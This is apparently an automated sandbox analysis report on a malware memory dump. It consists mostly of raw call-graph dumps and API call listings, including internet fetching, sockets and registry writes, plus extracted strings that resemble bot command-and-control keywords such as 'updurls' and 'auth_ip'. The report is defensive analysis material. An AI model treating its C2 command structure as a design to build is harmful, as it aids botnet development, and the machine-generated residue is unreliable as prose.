20168->20093 20170 2ae2288 20169->20170 20171 2ae22ab 20169->20171 20170->20171 20172 2ae228e 20170->20172 20925 2ae22c3 20171->20925 20174 2ae5d9b __read_nolock 59 API calls 20172->20174 20176 2ae2293 20174->20176 20175 2ae22be 20175->20093 20177 2ae4e35 __read_nolock 9 API calls 20176->20177 20178 2ae229e 20177->20178 20178->20093 20935 2ae27ae 20179->20935 20181 2ae27a9 20181->20093 20183 2ae3a97 20182->20183 20184 2ae2eec _malloc 59 API calls 20183->20184 20185 2ae3ab1 20183->20185 20186 2ae8143 _malloc RtlDecodePointer 20183->20186 20187 2ae3ab5 std::exception::exception 20183->20187 20184->20183 20185->20093 20186->20183 20188 2ae449a __CxxThrowException@8 RaiseException 20187->20188 20189 2ae3adf 20188->20189 20191 2ad9674 __EH_prolog 20190->20191 20192 2ad1ba7 210 API calls 20191->20192 20193 2ad96c9 20192->20193 20194 2ad96e6 RtlEnterCriticalSection 20193->20194 20195 2ad9704 RtlLeaveCriticalSection 20194->20195 20196 2ad9701 20194->20196 20195->20093 20196->20195 20198 2ada78c __EH_prolog 20197->20198 20941 2addf33 20198->20941 20200 2ada7aa shared_ptr 20200->20093 20202 2ae183d 20201->20202 20203 2ae1861 20201->20203 20202->20203 20204 2ae1851 GetProcessHeap HeapFree 20202->20204 20203->20093 20204->20203 20206 2ad4118 20205->20206 20207 2ad4112 20205->20207 20206->20093 20945 2ada636 20207->20945 20210 2ae2389 20209->20210 20211 2ae2374 20209->20211 20210->20211 20213 2ae2390 20210->20213 20212 2ae5d9b __read_nolock 59 API calls 20211->20212 20214 2ae2379 20212->20214 20947 2ae5f90 20213->20947 20216 2ae4e35 __read_nolock 9 API calls 20214->20216 20218 2ae2384 20216->20218 20218->20093 21172 2af5330 20220->21172 20222 2ad1bb1 RtlEnterCriticalSection 20223 2ad1be9 RtlLeaveCriticalSection 20222->20223 20224 2ad1bd1 20222->20224 21173 2ade263 20223->21173 20224->20223 20226 2ad1c55 RtlLeaveCriticalSection 20224->20226 20226->20093 20227 2ad1c22 20227->20226 20230 2ae0a50 Mailbox 68 API calls 20229->20230 20231 2ad3c7e 20230->20231 21255 2ad3ca2 
20231->21255 20237 2ad3d99 htons 20236->20237 20238 2ad3dcb htons 20236->20238 21282 2ad3bd3 20237->21282 21288 2ad3c16 20238->21288 20242 2ad3ded 20242->20093 20244 2ad8f40 __EH_prolog 20243->20244 21319 2ad373f 20244->21319 20246 2ad8f5a RtlEnterCriticalSection 20247 2ad8f69 RtlLeaveCriticalSection 20246->20247 20249 2ad8fa3 20247->20249 20249->20093 20251 2ae2eec _malloc 59 API calls 20250->20251 20252 2ad5362 SHGetSpecialFolderPathA 20251->20252 20253 2ad5378 20252->20253 21328 2ae36b4 20253->21328 20257 2ad53dc 21344 2ae39c7 20257->21344 20259 2ad53e2 20259->20093 20261 2ae0a79 20260->20261 20262 2ad513d 20260->20262 20263 2ae32e7 __cinit 68 API calls 20261->20263 20262->20105 20263->20262 20265 2ae0a50 Mailbox 68 API calls 20264->20265 20267 2ada672 20265->20267 20266 2ad519d 20266->20111 20266->20114 20266->20115 20267->20266 20274 2ad2db5 20267->20274 20270 2ae0a50 Mailbox 68 API calls 20269->20270 20272 2adce26 20270->20272 20271 2adcf35 20271->20111 20272->20271 20301 2ad2b95 20272->20301 20275 2ad2dca 20274->20275 20276 2ad2de4 20274->20276 20277 2ae0a50 Mailbox 68 API calls 20275->20277 20278 2ad2dfc 20276->20278 20280 2ad2def 20276->20280 20279 2ad2dcf 20277->20279 20288 2ad2d39 WSASetLastError WSASend 20278->20288 20279->20267 20282 2ae0a50 Mailbox 68 API calls 20280->20282 20282->20279 20283 2ad2e0c 20283->20279 20284 2ad2e54 WSASetLastError select 20283->20284 20285 2ae0a50 68 API calls Mailbox 20283->20285 20287 2ad2d39 71 API calls 20283->20287 20298 2ada43c 20284->20298 20285->20283 20287->20283 20289 2ada43c 69 API calls 20288->20289 20290 2ad2d6e 20289->20290 20291 2ad2d75 20290->20291 20292 2ad2d82 20290->20292 20294 2ae0a50 Mailbox 68 API calls 20291->20294 20293 2ad2d7a 20292->20293 20295 2ae0a50 Mailbox 68 API calls 20292->20295 20296 2ad2d9c 20293->20296 20297 2ae0a50 Mailbox 68 API calls 20293->20297 20294->20293 20295->20293 20296->20283 20297->20296 20299 2ae0a50 Mailbox 68 API calls 20298->20299 20300 2ada448 WSAGetLastError 
20299->20300 20300->20283 20302 2ad2bc7 20301->20302 20303 2ad2bb1 20301->20303 20304 2ad2bdf 20302->20304 20306 2ad2bd2 20302->20306 20305 2ae0a50 Mailbox 68 API calls 20303->20305 20307 2ad2be2 WSASetLastError WSARecv 20304->20307 20308 2ad2bb6 20304->20308 20311 2ad2d22 20304->20311 20312 2ae0a50 68 API calls Mailbox 20304->20312 20314 2ad2cbc WSASetLastError select 20304->20314 20305->20308 20309 2ae0a50 Mailbox 68 API calls 20306->20309 20310 2ada43c 69 API calls 20307->20310 20308->20272 20309->20308 20310->20304 20316 2ad1996 20311->20316 20312->20304 20315 2ada43c 69 API calls 20314->20315 20315->20304 20317 2ad19bb 20316->20317 20318 2ad199f 20316->20318 20317->20308 20319 2ae32e7 __cinit 68 API calls 20318->20319 20319->20317 20342 2ade1b3 20320->20342 20322 2add033 20322->20133 20427 2ae32fc 20323->20427 20326 2ae2054 20326->20135 20327 2ae207d ResumeThread 20327->20135 20328 2ae2076 CloseHandle 20328->20327 20330 2ae0a50 Mailbox 68 API calls 20329->20330 20331 2ad3fb8 20330->20331 20746 2ad1815 20331->20746 20334 2ada5be 20335 2ada5c8 __EH_prolog 20334->20335 20752 2adcb76 20335->20752 20343 2ade1bd __EH_prolog 20342->20343 20348 2ad4030 20343->20348 20347 2ade1eb 20347->20322 20360 2af5330 20348->20360 20350 2ad403a GetProcessHeap RtlAllocateHeap 20351 2ad407c 20350->20351 20352 2ad4053 std::exception::exception 20350->20352 20351->20347 20354 2ad408a 20351->20354 20361 2ada5fd 20352->20361 20355 2ad4094 __EH_prolog 20354->20355 20408 2ada21c 20355->20408 20360->20350 20362 2ada607 __EH_prolog 20361->20362 20369 2adcbac 20362->20369 20368 2ada635 20378 2add70c 20369->20378 20372 2adcbc6 20400 2add744 20372->20400 20374 2ada624 20375 2ae449a 20374->20375 20376 2ae44b9 RaiseException 20375->20376 20376->20368 20381 2ae2453 20378->20381 20384 2ae2481 20381->20384 20385 2ae248f 20384->20385 20389 2ada616 20384->20389 20390 2ae2517 20385->20390 20389->20372 20391 2ae2494 20390->20391 20392 2ae2520 20390->20392 20391->20389 20394 2ae24d9 20391->20394 20393 
2ae2eb4 _free 59 API calls 20392->20393 20393->20391 20395 2ae24e5 _strlen 20394->20395 20396 2ae250a 20394->20396 20397 2ae2eec _malloc 59 API calls 20395->20397 20396->20389 20398 2ae24f7 20397->20398 20398->20396 20399 2ae6bfc __fltout2 59 API calls 20398->20399 20399->20396 20401 2add74e __EH_prolog 20400->20401 20404 2adb66f 20401->20404 20403 2add785 Mailbox 20403->20374 20405 2adb679 __EH_prolog 20404->20405 20406 2ae2453 std::exception::exception 59 API calls 20405->20406 20407 2adb68a Mailbox 20406->20407 20407->20403 20419 2adb033 20408->20419 20411 2ad3fdc 20426 2af5330 20411->20426 20413 2ad3fe6 CreateEventA 20414 2ad3ffd 20413->20414 20415 2ad400f 20413->20415 20416 2ad3fb0 Mailbox 68 API calls 20414->20416 20415->20347 20417 2ad4005 20416->20417 20418 2ada5be Mailbox 60 API calls 20417->20418 20418->20415 20420 2ad40c1 20419->20420 20421 2adb03f 20419->20421 20420->20411 20422 2ae3a8f _Allocate 60 API calls 20421->20422 20423 2adb04f std::exception::exception 20421->20423 20422->20423 20423->20420 20424 2ae449a __CxxThrowException@8 RaiseException 20423->20424 20425 2adfa64 20424->20425 20426->20413 20428 2ae331e 20427->20428 20429 2ae330a 20427->20429 20431 2ae89ac __calloc_crt 59 API calls 20428->20431 20430 2ae5d9b __read_nolock 59 API calls 20429->20430 20432 2ae330f 20430->20432 20433 2ae332b 20431->20433 20434 2ae4e35 __read_nolock 9 API calls 20432->20434 20435 2ae337c 20433->20435 20437 2ae5b9a _strtok 59 API calls 20433->20437 20440 2ae204b 20434->20440 20436 2ae2eb4 _free 59 API calls 20435->20436 20438 2ae3382 20436->20438 20439 2ae3338 20437->20439 20438->20440 20446 2ae5d7a 20438->20446 20441 2ae5c21 __initptd 59 API calls 20439->20441 20440->20326 20440->20327 20440->20328 20442 2ae3341 CreateThread 20441->20442 20442->20440 20445 2ae3374 GetLastError 20442->20445 20454 2ae345c 20442->20454 20445->20435 20451 2ae5d67 20446->20451 20448 2ae5d83 _free 20449 2ae5d9b __read_nolock 59 API calls 20448->20449 20450 2ae5d96 20449->20450 
20450->20440 20452 2ae5bb2 __getptd_noexit 59 API calls 20451->20452 20453 2ae5d6c 20452->20453 20453->20448 20455 2ae3465 __threadstartex@4 20454->20455 20456 2ae910b __CRT_INIT@12 TlsGetValue 20455->20456 20457 2ae346b 20456->20457 20458 2ae349e 20457->20458 20459 2ae3472 __threadstartex@4 20457->20459 20460 2ae5a2f __freefls@4 59 API calls 20458->20460 20461 2ae912a __CRT_INIT@12 TlsSetValue 20459->20461 20463 2ae34b9 ___crtIsPackagedApp 20460->20463 20462 2ae3481 20461->20462 20465 2ae3487 GetLastError RtlExitUserThread 20462->20465 20466 2ae3494 GetCurrentThreadId 20462->20466 20464 2ae34cd 20463->20464 20470 2ae3404 20463->20470 20476 2ae3395 20464->20476 20465->20466 20466->20463 20471 2ae340d LoadLibraryExW GetProcAddress 20470->20471 20472 2ae3446 RtlDecodePointer 20470->20472 20473 2ae342f 20471->20473 20474 2ae3430 RtlEncodePointer 20471->20474 20475 2ae3456 20472->20475 20473->20464 20474->20472 20475->20464 20477 2ae33a1 ___BuildCatchObject 20476->20477 20478 2ae5b9a _strtok 59 API calls 20477->20478 20479 2ae33a6 20478->20479 20486 2ae20a0 20479->20486 20504 2ae1550 20486->20504 20489 2ae20e8 TlsSetValue 20490 2ae20f0 20489->20490 20526 2addce7 20490->20526 20524 2ae15b4 20504->20524 20505 2ae1630 20507 2ae1646 20505->20507 20509 2ae1643 CloseHandle 20505->20509 20506 2ae15cc 20508 2ae160e ResetEvent 20506->20508 20512 2ae15e5 OpenEventA 20506->20512 20542 2ae1b50 20506->20542 20510 2ae448b _strtok 6 API calls 20507->20510 20511 2ae1615 20508->20511 20509->20507 20514 2ae165e 20510->20514 20546 2ae1790 20511->20546 20516 2ae15ff 20512->20516 20517 2ae1607 20512->20517 20513 2ae16dc WaitForSingleObject 20513->20524 20514->20489 20514->20490 20516->20517 20520 2ae1604 CloseHandle 20516->20520 20517->20508 20517->20511 20518 2ae16b0 CreateEventA 20518->20524 20519 2ae15e2 20519->20512 20520->20517 20522 2ae1b50 GetCurrentProcessId 20522->20524 20524->20505 20524->20506 20524->20513 20524->20518 20524->20522 20525 2ae16ce CloseHandle 20524->20525 
20525->20524 20527 2addd09 20526->20527 20556 2ae0bb0 20542->20556 20544 2ae1ba2 GetCurrentProcessId 20545 2ae1bb5 20544->20545 20545->20519 20547 2ae179f 20546->20547 20550 2ae17d5 CreateEventA 20547->20550 20551 2ae1b50 GetCurrentProcessId 20547->20551 20553 2ae17f7 20547->20553 20548 2ae162d 20548->20505 20549 2ae1803 SetEvent 20549->20548 20552 2ae17eb 20550->20552 20550->20553 20554 2ae17d2 20551->20554 20552->20553 20553->20548 20553->20549 20554->20550 20556->20544 20749 2ae2413 20746->20749 20750 2ae24d9 std::exception::_Copy_str 59 API calls 20749->20750 20751 2ad182a 20750->20751 20751->20334 20758 2add63d 20752->20758 20755 2adcb90 20767 2add675 20755->20767 20761 2adb161 20758->20761 20762 2adb16b __EH_prolog 20761->20762 20763 2ae2453 std::exception::exception 59 API calls 20762->20763 20764 2adb17c 20763->20764 20765 2ad7c31 std::bad_exception::bad_exception 60 API calls 20764->20765 20766 2ada5dd 20765->20766 20766->20755 20768 2add67f __EH_prolog 20767->20768 20771 2adb559 20768->20771 20772 2adb563 __EH_prolog 20771->20772 20773 2adb161 std::bad_exception::bad_exception 60 API calls 20772->20773 20796 2ad353e 20775->20796 20779 2ad2ae8 WSASetLastError connect 20778->20779 20780 2ad2ad8 20778->20780 20782 2ada43c 69 API calls 20779->20782 20781 2ae0a50 Mailbox 68 API calls 20780->20781 20786 2ad2add 20781->20786 20783 2ad2b07 20782->20783 20784 2ae0a50 Mailbox 68 API calls 20783->20784 20783->20786 20784->20786 20785 2ae0a50 Mailbox 68 API calls 20787 2ad2b1b 20785->20787 20786->20785 20788 2ae0a50 Mailbox 68 API calls 20787->20788 20790 2ad2b38 20787->20790 20788->20790 20792 2ad2b87 20790->20792 20856 2ad3027 20790->20856 20792->20148 20795 2ae0a50 Mailbox 68 API calls 20795->20792 20797 2ad3548 __EH_prolog 20796->20797 20798 2ad3557 20797->20798 20799 2ad3576 20797->20799 20801 2ad1996 68 API calls 20798->20801 20818 2ad2edd WSASetLastError WSASocketA 20799->20818 20815 2ad355f 20801->20815 20803 2ad35ad CreateIoCompletionPort 20804 2ad35db 
20803->20804 20805 2ad35c5 GetLastError 20803->20805 20807 2ae0a50 Mailbox 68 API calls 20804->20807 20806 2ae0a50 Mailbox 68 API calls 20805->20806 20808 2ad35d2 20806->20808 20807->20808 20809 2ad35ef 20808->20809 20810 2ad3626 20808->20810 20811 2ae0a50 Mailbox 68 API calls 20809->20811 20844 2adde26 20810->20844 20812 2ad3608 20811->20812 20826 2ad29ee 20812->20826 20815->20145 20816 2ad3659 20817 2ae0a50 Mailbox 68 API calls 20816->20817 20817->20815 20819 2ae0a50 Mailbox 68 API calls 20818->20819 20820 2ad2f0a WSAGetLastError 20819->20820 20821 2ad2f41 20820->20821 20822 2ad2f21 20820->20822 20821->20803 20821->20815 20823 2ad2f3c 20822->20823 20824 2ad2f27 setsockopt 20822->20824 20825 2ae0a50 Mailbox 68 API calls 20823->20825 20824->20823 20825->20821 20827 2ad2a0c 20826->20827 20828 2ad2aad 20826->20828 20829 2ad2a39 WSASetLastError closesocket 20827->20829 20833 2ae0a50 Mailbox 68 API calls 20827->20833 20830 2ae0a50 Mailbox 68 API calls 20828->20830 20832 2ad2ab8 20828->20832 20831 2ada43c 69 API calls 20829->20831 20830->20832 20834 2ad2a51 20831->20834 20832->20815 20835 2ad2a21 20833->20835 20834->20828 20837 2ae0a50 Mailbox 68 API calls 20834->20837 20848 2ad2f50 20835->20848 20839 2ad2a5c 20837->20839 20840 2ad2a7b ioctlsocket WSASetLastError closesocket 20839->20840 20841 2ae0a50 Mailbox 68 API calls 20839->20841 20842 2ada43c 69 API calls 20840->20842 20843 2ad2a6e 20841->20843 20842->20828 20843->20828 20843->20840 20845 2adde30 __EH_prolog 20844->20845 20846 2ae3a8f _Allocate 60 API calls 20845->20846 20847 2adde44 20846->20847 20847->20816 20849 2ad2f5b 20848->20849 20850 2ad2f70 WSASetLastError setsockopt 20848->20850 20851 2ae0a50 Mailbox 68 API calls 20849->20851 20852 2ada43c 69 API calls 20850->20852 20854 2ad2a36 20851->20854 20853 2ad2f9e 20852->20853 20853->20854 20855 2ae0a50 Mailbox 68 API calls 20853->20855 20854->20829 20855->20854 20857 2ad304d WSASetLastError select 20856->20857 20858 2ad303b 20856->20858 20860 2ada43c 69 API 
calls 20857->20860 20859 2ae0a50 Mailbox 68 API calls 20858->20859 20863 2ad2b59 20859->20863 20861 2ad3095 20860->20861 20862 2ae0a50 Mailbox 68 API calls 20861->20862 20861->20863 20862->20863 20863->20792 20864 2ad2fb4 20863->20864 20865 2ad2fd5 WSASetLastError getsockopt 20864->20865 20866 2ad2fc0 20864->20866 20868 2ada43c 69 API calls 20865->20868 20867 2ae0a50 Mailbox 68 API calls 20866->20867 20870 2ad2b7a 20867->20870 20869 2ad300f 20868->20869 20869->20870 20871 2ae0a50 Mailbox 68 API calls 20869->20871 20870->20792 20870->20795 20871->20870 20879 2af5330 20872->20879 20874 2ad32b5 RtlEnterCriticalSection 20875 2ae0a50 Mailbox 68 API calls 20874->20875 20876 2ad32d6 20875->20876 20880 2ad3307 20876->20880 20879->20874 20882 2ad3311 __EH_prolog 20880->20882 20883 2ad3350 20882->20883 20892 2ad7db5 20882->20892 20896 2ad239d 20883->20896 20886 2ae0a50 Mailbox 68 API calls 20888 2ad337c 20886->20888 20890 2ad2d39 71 API calls 20888->20890 20891 2ad3390 20890->20891 20902 2ad7d5e 20891->20902 20893 2ad7dc3 20892->20893 20895 2ad7e39 20893->20895 20906 2ad891a 20893->20906 20895->20882 20897 2ad23ab 20896->20897 20898 2ad2417 20897->20898 20899 2ad23c1 PostQueuedCompletionStatus 20897->20899 20901 2ad23f8 InterlockedExchange RtlLeaveCriticalSection 20897->20901 20898->20886 20898->20891 20899->20897 20900 2ad23da RtlEnterCriticalSection 20899->20900 20900->20897 20901->20897 20903 2ad7d63 20902->20903 20904 2ad32ee RtlLeaveCriticalSection 20903->20904 20922 2ad1e7f 20903->20922 20904->20164 20907 2ad8944 20906->20907 20908 2ad7d5e 68 API calls 20907->20908 20909 2ad898a 20908->20909 20910 2ad89b1 20909->20910 20912 2ada1a7 20909->20912 20910->20895 20913 2ada1c1 20912->20913 20914 2ada1b1 20912->20914 20913->20910 20914->20913 20917 2adfa65 20914->20917 20918 2ae2413 std::exception::exception 59 API calls 20917->20918 20919 2adfa7d 20918->20919 20920 2ae449a __CxxThrowException@8 RaiseException 20919->20920 20921 2adfa92 20920->20921 20923 2ae0a50 Mailbox 68 
API calls 20922->20923 20924 2ad1e90 20923->20924 20924->20903 20926 2ae21bb _LocaleUpdate::_LocaleUpdate 59 API calls 20925->20926 20927 2ae22d7 20926->20927 20928 2ae22e5 20927->20928 20934 2ae22fc 20927->20934 20929 2ae5d9b __read_nolock 59 API calls 20928->20929 20930 2ae22ea 20929->20930 20931 2ae4e35 __read_nolock 9 API calls 20930->20931 20932 2ae22f5 ___ascii_stricmp 20931->20932 20932->20175 20933 2ae58ba 66 API calls __tolower_l 20933->20934 20934->20932 20934->20933 20936 2ae27cb 20935->20936 20937 2ae5d9b __read_nolock 59 API calls 20936->20937 20940 2ae27db _strlen 20936->20940 20938 2ae27d0 20937->20938 20939 2ae4e35 __read_nolock 9 API calls 20938->20939 20939->20940 20940->20181 20942 2addf3d __EH_prolog 20941->20942 20943 2ae3a8f _Allocate 60 API calls 20942->20943 20944 2addf54 20943->20944 20944->20200 20946 2ada645 GetProcessHeap HeapFree 20945->20946 20946->20206 20948 2ae21bb _LocaleUpdate::_LocaleUpdate 59 API calls 20947->20948 20949 2ae6005 20948->20949 20950 2ae5d9b __read_nolock 59 API calls 20949->20950 20951 2ae600a 20950->20951 20952 2ae6adb 20951->20952 20966 2ae602a __output_l __aulldvrm _strlen 20951->20966 20992 2ae9d71 20951->20992 20953 2ae5d9b __read_nolock 59 API calls 20952->20953 20955 2ae6ae0 20953->20955 20957 2ae4e35 __read_nolock 9 API calls 20955->20957 20956 2ae6ab5 20958 2ae448b _strtok 6 API calls 20956->20958 20957->20956 20959 2ae23b6 20958->20959 20959->20218 20971 2ae5e41 20959->20971 20961 2ae6b10 79 API calls _write_multi_char 20961->20966 20962 2ae6693 RtlDecodePointer 20962->20966 20963 2ae6b58 79 API calls _write_multi_char 20963->20966 20964 2ae2eb4 _free 59 API calls 20964->20966 20965 2ae6b84 79 API calls _write_string 20965->20966 20966->20952 20966->20956 20966->20961 20966->20962 20966->20963 20966->20964 20966->20965 20967 2ae89f4 __malloc_crt 59 API calls 20966->20967 20968 2ae66f6 RtlDecodePointer 20966->20968 20969 2ae671b RtlDecodePointer 20966->20969 20970 2aefa24 61 API calls __cftof 20966->20970 
20999 2aedc4e 20966->20999 20967->20966 20968->20966 20969->20966 20970->20966 20972 2ae9d71 __ungetc_nolock 59 API calls 20971->20972 20973 2ae5e4f 20972->20973 20974 2ae5e5a 20973->20974 20975 2ae5e71 20973->20975 20977 2ae5d9b __read_nolock 59 API calls 20974->20977 20976 2ae5e76 20975->20976 20985 2ae5e83 __flsbuf 20975->20985 20978 2ae5d9b __read_nolock 59 API calls 20976->20978 20979 2ae5e5f 20977->20979 20978->20979 20979->20218 20980 2ae5ee7 20983 2ae5f01 20980->20983 20986 2ae5f18 20980->20986 20981 2ae5f61 20982 2ae9d95 __write 79 API calls 20981->20982 20982->20979 21014 2ae9d95 20983->21014 20985->20979 20988 2ae5ed2 20985->20988 20991 2ae5edd 20985->20991 21002 2aef6e2 20985->21002 20986->20979 21042 2aef736 20986->21042 20988->20991 21011 2aef8a5 20988->21011 20991->20980 20991->20981 20993 2ae9d7b 20992->20993 20994 2ae9d90 20992->20994 20995 2ae5d9b __read_nolock 59 API calls 20993->20995 20994->20966 20996 2ae9d80 20995->20996 20997 2ae4e35 __read_nolock 9 API calls 20996->20997 20998 2ae9d8b 20997->20998 20998->20966 21000 2ae21bb _LocaleUpdate::_LocaleUpdate 59 API calls 20999->21000 21001 2aedc5f 21000->21001 21001->20966 21003 2aef6ed 21002->21003 21004 2aef6fa 21002->21004 21005 2ae5d9b __read_nolock 59 API calls 21003->21005 21006 2ae5d9b __read_nolock 59 API calls 21004->21006 21008 2aef706 21004->21008 21007 2aef6f2 21005->21007 21009 2aef727 21006->21009 21007->20988 21008->20988 21010 2ae4e35 __read_nolock 9 API calls 21009->21010 21010->21007 21012 2ae89f4 __malloc_crt 59 API calls 21011->21012 21013 2aef8ba 21012->21013 21013->20991 21015 2ae9da1 ___BuildCatchObject 21014->21015 21016 2ae9dae 21015->21016 21017 2ae9dc5 21015->21017 21018 2ae5d67 __read_nolock 59 API calls 21016->21018 21019 2ae9e64 21017->21019 21022 2ae9dd9 21017->21022 21021 2ae9db3 21018->21021 21020 2ae5d67 __read_nolock 59 API calls 21019->21020 21023 2ae9dfc 21020->21023 21024 2ae5d9b __read_nolock 59 API calls 21021->21024 21025 2ae9df7 21022->21025 21026 2ae9e01 
[Rendered call-graph edge list omitted (graph residue). Its nodes are basic blocks in the 02AD1000 module region (02AD..., 02AE..., 02AF...) and in the 0040xxxx image. Windows APIs named on those nodes: RtlInitializeCriticalSection, RtlEnterCriticalSection, RtlLeaveCriticalSection, InitializeCriticalSectionAndSpinCount, InterlockedCompareExchange, WriteFile, SetFilePointerEx, GetLastError, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, MultiByteToWideChar, AreFileApisANSI, CreateWaitableTimerA, SetWaitableTimer, CreateEventA, WaitForSingleObject, FindCloseChangeNotification, CloseHandle, RaiseException, WSASetLastError, WSAStringToAddressA, htonl, GetModuleHandleA, GetProcAddress, GetTickCount, Sleep, RegCreateKeyExA, RegSetValueExA, RegCloseKey, lstrcmpiW, LoadLibraryA, LoadLibraryExA, FreeLibrary, GetAdaptersInfo, VirtualAlloc, DeleteFileA, CreateFileA, DeviceIoControl, GetCommandLineW, CommandLineToArgvW, GetLocalTime. CRT internals on the same nodes include __read_nolock, __write_nolock, __lseeki64_nolock, ___lock_fhandle, __flsbuf, __ungetc_nolock, __fsopen, __openfile, __commit, _strtok, _memcmp, _memmove, _malloc, _free, __beginthreadex and __CxxThrowException@8.]

Control-flow Graph

[Rendered graph omitted (graph residue); the executed/not-executed legend and edge list are not reproduced. Nodes span basic blocks 2ad66f0 through 2ad7b52, with block 0 at 2ad72a7-2ad72bf. Windows APIs named on the graph's blocks: InternetOpenA, InternetSetOptionA, InternetOpenUrlA, InternetReadFile, InternetCloseHandle, RtlEnterCriticalSection, RtlLeaveCriticalSection, Sleep.]
APIs
• Sleep.KERNELBASE(0000EA60), ref: 02AD6704
• RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD670F
• RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD6720
• _memset.LIBCMT ref: 02AD6775
• _memset.LIBCMT ref: 02AD6784
• InternetOpenA.WININET(?), ref: 02AD72B1
• InternetSetOptionA.WININET(00000000,00000002,?), ref: 02AD72D9
• InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02AD72F1
• InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02AD7309
• _memset.LIBCMT ref: 02AD7319
• InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02AD7332
• InternetReadFile.WININET(00000000,?,00001000,?), ref: 02AD7354
• InternetCloseHandle.WININET(00000000), ref: 02AD7374
• InternetCloseHandle.WININET(00000000), ref: 02AD737F
• _memset.LIBCMT ref: 02AD73C7
• RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD73EA
• RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD73FB
• _malloc.LIBCMT ref: 02AD7494
• RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD74A6
• RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD74B2
• _memset.LIBCMT ref: 02AD74CC
• _memset.LIBCMT ref: 02AD74DB
• _memset.LIBCMT ref: 02AD74EB
• _memset.LIBCMT ref: 02AD74FE
• _memset.LIBCMT ref: 02AD7514
• _malloc.LIBCMT ref: 02AD758A
• _memset.LIBCMT ref: 02AD759B
• _strtok.LIBCMT ref: 02AD75BB
• _swscanf.LIBCMT ref: 02AD75D2
• _strtok.LIBCMT ref: 02AD75E9
• _free.LIBCMT ref: 02AD75F5
• Sleep.KERNEL32(000007D0), ref: 02AD76ED
• _memset.LIBCMT ref: 02AD7761
• RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD776E
• RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD7780
• _sprintf.LIBCMT ref: 02AD781E
• RtlEnterCriticalSection.NTDLL(00000020), ref: 02AD78E2
• RtlLeaveCriticalSection.NTDLL(00000020), ref: 02AD7916
Strings
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
• String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
• API String ID: 696907137-1839899575
• Opcode ID: f3f326d963d645fbba287e620b74e9f45185b598b21acd600bb54660895a8ae0
• Instruction ID: e2c1af859a0dc4b8c1e48259fc615aa1014f0d519647c578b863262db5e3deca
• Opcode Fuzzy Hash: f3f326d963d645fbba287e620b74e9f45185b598b21acd600bb54660895a8ae0
• Instruction Fuzzy Hash: E432D131588381AFE739AB64DD40BAFBBEAAF89714F00081DF58A97290DF749405CF56
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted (graph residue); the executed/not-executed legend and edge list are not reproduced. The graph starts at block 2ad6487-2ad64e8 and its nodes span basic blocks 2ad6487 through 2ad7b52. Windows APIs named on the graph's blocks: RtlInitializeCriticalSection, GetModuleHandleA, GetProcAddress, GetTickCount, GetVersionExA, GetProcessHeap, RtlAllocateHeap, RtlEnterCriticalSection, RtlLeaveCriticalSection, QueryPerformanceCounter, Sleep, InternetOpenA, InternetSetOptionA, InternetOpenUrlA, InternetReadFile, InternetCloseHandle.]
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.NTDLL(02B071B8), ref: 02AD64B6
                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02AD64CD
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AD64D6
                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02AD64E5
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AD64E8
                                                                            • GetTickCount.KERNEL32 ref: 02AD64F4
                                                                              • Part of subcall function 02AD605A: _malloc.LIBCMT ref: 02AD6068
                                                                            • GetVersionExA.KERNEL32(02B07010), ref: 02AD6521
                                                                            • _memset.LIBCMT ref: 02AD6540
                                                                            • _malloc.LIBCMT ref: 02AD654D
                                                                              • Part of subcall function 02AE2EEC: __FF_MSGBANNER.LIBCMT ref: 02AE2F03
                                                                              • Part of subcall function 02AE2EEC: __NMSG_WRITE.LIBCMT ref: 02AE2F0A
                                                                              • Part of subcall function 02AE2EEC: RtlAllocateHeap.NTDLL(00780000,00000000,00000001), ref: 02AE2F2F
                                                                            • _malloc.LIBCMT ref: 02AD655D
                                                                            • _malloc.LIBCMT ref: 02AD6568
                                                                            • _malloc.LIBCMT ref: 02AD6573
                                                                            • _malloc.LIBCMT ref: 02AD657E
                                                                            • _malloc.LIBCMT ref: 02AD6589
                                                                            • _malloc.LIBCMT ref: 02AD6594
                                                                            • _malloc.LIBCMT ref: 02AD65A3
                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02AD65BA
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02AD65C3
                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02AD65D2
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02AD65D5
                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02AD65E0
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02AD65E3
                                                                            • _memset.LIBCMT ref: 02AD65F6
                                                                            • _memset.LIBCMT ref: 02AD6602
                                                                            • _memset.LIBCMT ref: 02AD660F
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD661D
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD662A
                                                                            • _malloc.LIBCMT ref: 02AD664E
                                                                            • _malloc.LIBCMT ref: 02AD665C
